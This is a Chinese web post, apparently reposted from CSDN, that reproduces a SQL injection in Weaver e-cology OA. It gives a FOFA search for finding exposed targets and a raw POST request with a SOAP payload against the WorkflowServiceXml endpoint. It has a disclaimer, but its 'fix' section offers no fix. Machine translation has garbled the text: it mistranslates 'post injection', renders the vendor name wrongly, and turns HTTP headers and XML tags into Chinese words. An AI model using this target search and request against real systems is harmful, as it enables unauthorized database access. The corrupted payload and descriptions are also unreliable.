【漏洞复现】泛微SQL注入漏洞(泛微oa注入)

【漏洞复现】泛微SQL注入漏洞漏洞描述
该系统存在post注入 免责声明
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害

漏洞描述

该系统具有后喷射功能

免责声明

技术文章仅供参考。使用互联网的个人或者组织必须遵守宪法和法律,遵守公共秩序和道德,不得利用互联网从事危害国家安全、荣誉和利益的活动。如果您引用文章中的技术信息,您的计算机系统将会执行侵入性操作。用户应对因使用本文提供的信息而造成的任何直接或间接的后果和损失负责。本文提供的工具仅用于教育目的,不得用于任何其他目的。

漏洞集合

【交流要点】持续更新数千个漏洞复现集合exp poc

资产确定

fofa:app=\’盘维-OA(e-cology)\’

漏洞复现

POST /services/WorkflowServiceXml HTTP/1.1

主机: 127.0.0.1

用户代理: Go-http-client/1.1

内容长度: 475

内容类型: 文本/xml

Accept-Encoding: gzip、deflate、br

关闭连接:

soapenv:Envelope xmlns:soapenv=\’http://schemas.xmlsoap.org/soap/envelope/\’ xmlns:web=\’http://webservices.workflow.weaver\’soapenv:Header/

soopenv:本体

web:getHendledWorkflowRequestList

web:in01/web:in0

web:in11/web:in1

web:in21/web:in2

web:in31/web:in3

网络:in4

web:string1=1/web:string

/web:in4

/web:getHendledWorkflowRequestList

/soapenv: 主体

/soapenv: 信封

修复方案

# 【漏洞复现】以上网上有关Pan-Micro SQL注入漏洞的相关内容仅供参考。相关信息请参见官方公告。

原创文章,作者:CSDN,如若转载,请注明出处:https://www.sudun.com/ask/93847.html

(0)
CSDN的头像CSDN
上一篇 2024年7月26日
下一篇 2024年7月26日

相关推荐

发表回复

您的电子邮箱地址不会被公开。 必填项已用 * 标注